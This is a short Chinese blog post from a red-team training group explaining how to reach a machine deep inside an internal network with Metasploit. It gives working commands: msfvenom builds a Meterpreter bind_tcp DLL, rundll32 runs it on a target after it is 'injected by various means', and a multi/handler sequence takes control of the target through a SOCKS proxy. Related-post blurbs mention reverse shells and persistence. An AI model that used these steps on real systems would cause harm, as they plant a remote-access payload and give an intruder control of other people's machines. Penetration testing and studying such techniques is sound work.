内网深层穿透之metasploit正向连接

最新推荐文章于 2024-06-21 18:12:08 发布
最新推荐文章于 2024-06-21 18:12:08 发布
阅读量987 收藏 1
点赞数
分类专栏: 红队攻防
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/iverson1180/article/details/104186834
版权

来自:5号黯区
5号黯区是一支致力于红队攻防研究与培训的团队,官网:http://www.dark5.net

深层内网无法转发出来,所以就用了代理加正向。
多层内网下的穿透,第一层建立反向Socks代理,把MSF代入代理去连接处在第二层的机器。

生成:
msfvenom -p windows/x64/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=4433 -f dll >/root/meterpreter_bind_tcp_x64_4433.dll

通过各种手法注入到第二层的目标机器:
rundll32.exe meterpreter_bind_tcp_x64_4433.dll Start

连接:

use exploit/multi/handler 
set payload windows/x64/meterpreter/bind_tcp
show options 
set lport 4433
set rhost <Target_ip>
run

5号黯区是一支致力于红队攻防研究与培训的团队,官网:http://www.dark5.net

关于我们

5号黯区是一支致力于红队攻防研究与培训的团队,官网:http://www.dark5.net

加入QQ群

加入QQ群

关注公众号

关注公众号

5号黯区
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Metasploit基本用法
Johnathan的博客
02-25 336
今天玩了一把内网渗透,其中主要用到了metasploit这款内网渗透神器。metasploit大家肯定不陌生,我也在很早之前就有接触过,但每次重新使用它时都会遗忘一些用法,因此为了方便查询我在本篇记录下metasploit神器的一些常用命令,以及内网渗透中如何使用它。 Mac下安装metasploit mac下安装metasploit比较简单,官网下载pkg安装包,直接安装即可;需要注意的是安装完成后的路径。 msfconsole路径: /opt/metasploit-framework/bin
渗透测试之Metasploit
06-16
本套教程,我们将为大家详细讲解Metasploit的使用方法。 Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全...
新手学习渗透测试的入门指南
46的十哥哥的5哥哥
11-16 1万+
渗透测试入门手册 本手册将持续更新!这是20190707版 如果觉得本文有用,请高抬贵手分享给你的朋友。 渗透测试是什么? 维基百科的释义:https://zh.wikipedia.org/wiki/渗透测试 百度百科的释义:https://baike.baidu.com/item/渗透测试 5号黯区的释义:我们理解的渗透测试是通过各种手段对目标进行一次渗透(攻击),通过渗透来测试目标...
内网渗透 Metasploit(MSF)基础使用
qq_49433473的博客
10-24 1万+
内网渗透 Metasploit(MSF)使用,信息搜集,模块详解,端口扫描,反弹shell
内网安全:代理技术详解
最新发布
baimao__Ch的博客
06-21 675
背景:拿下内网的一个主机权限并且上线到MSF/CS上,IP:192.168.x.*使用控制192.168.x.*的Meterpreter启动路由,MSF相当于进入到该网段中开启节点,支持代理来的转发流量攻击机A(外网,军火库)配置代理到MSF上CS代理建立:有手就行在192.168.x.*的会话上开启SOCKS代理在攻击机A上配置代理装置建立通讯的最大意义就是:可以实现攻击机与内网主机的通讯,有了通讯才能横向移动要根据防火墙因地制宜的选择方式。
MSF内网穿透
weixin_46686336的博客
11-08 368
MSF内网穿透
渗透测试【网络安全】入门指南【20190607】
aian3941的博客
06-24 347
原文地址:https://www.52stu.org/?p=149 来源:5号暗区 5号黯区 五号黯区 5号暗区 渗透测试入门手册 本手册将持续更新!这是20190707版 如果觉得本文有用,请高抬贵手分享给你的朋友。 渗透测试是什么? 维基百科的释义:https://zh.wikipedia.org/wiki/渗透测试 百度百科的释义:https://baike.baidu.com/...
metasploit-framework-6.3.34.zip
09-17
Metasploit Framework 6.3.34:渗透测试的利器》 Metasploit Framework,简称MSF,是一款开源的安全漏洞检测工具,主要用于安全研究人员进行渗透测试和漏洞验证。这个版本是6.3.34,代表着软件的最新迭代,通常会...
metasploitframework-latest.msi
09-17
metasploitframework-latest.msi
metasploitframework框架
09-28
metasploit-framework-V6.1.8适用于Windows系统。 Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。
metasploit
12-19
后渗透的多种方法,meterpreter 在获取shell之后,如何持续控制目标主机,即在目标主机重启或下次开机后能自动连接到攻击主机上,不必每次都需要进行攻击取得 meterpreter。
Metasploit_V4.20.zip
01-10
Metasploit框架详解及其应用》 Metasploit是一款广泛应用于网络安全测试和漏洞评估的开源工具,其核心功能是提供了一套完整的环境来构建、测试和执行exploits(利用代码)。Metasploit V4.20是该框架的一个重要...
Metasploit教程
06-07
Metasploit教程Metasploit教程Metasploit教程Metasploit教程
Metasploit渗透测试指南.修订版
09-12
Metasploit渗透测试指南》是一本专注于网络安全领域的重要书籍,尤其对于那些希望深入了解和运用Metasploit框架进行渗透测试的专业人士来说,它提供了一条深入理解与实践的路径。Metasploit是一款强大的开源安全...
Metasploit渗透测试魔鬼训练营 读书笔记
09-18
渗透测试-内网客户端渗透9.pdf 渗透测试-内网网络服务端渗透7.pdf 渗透测试-后渗透阶段10.pdf 渗透测试-实验拓扑环境4.pdf 渗透测试-情报搜集5.pdf 渗透测试-社会工程学8.pdf 渗透测试-移动环境渗透3.pdf ...
利用msf进行内网的木马渗透详细教程
m0_52332592的博客
11-11 4152
内网渗透木马测试
内网安全:内网穿透详解
热门推荐
qq_61553520的博客
06-12 2万+
区别于代理技术,隧道技术,三种技术都有解决通讯的问题,但是侧重不一样代理技术可以把外网攻击机带进内网进行渗透隧道技术解决了因为防火墙限制流量不出网的问题内网穿透解决和内网主机建立连接的问题,可以远程访问内网的服务器要根据不同使用场景来选择使用。
msf添加路由及socks代理进行内网穿透
2301_76227305的博客
02-21 1659
前面发过一篇cs开启socks代理实现内网穿透的,今天写一下msf添加socks代理实现内网访问以上的操作都是基于我们已经熟悉了其内网的环境,但在现实中往往要进行大量的内网信息收集工作。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
msf和frp内网穿透
08-19
虽然msf主要是用于渗透测试和漏洞利用,但它也可以通过反向连接来实现内网穿透。你可以在目标机器上执行一个反向Shell并将其连接到外部控制台,从而实现对内网设备的访问。 Frp是一个高性能的反向代理工具,可以...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值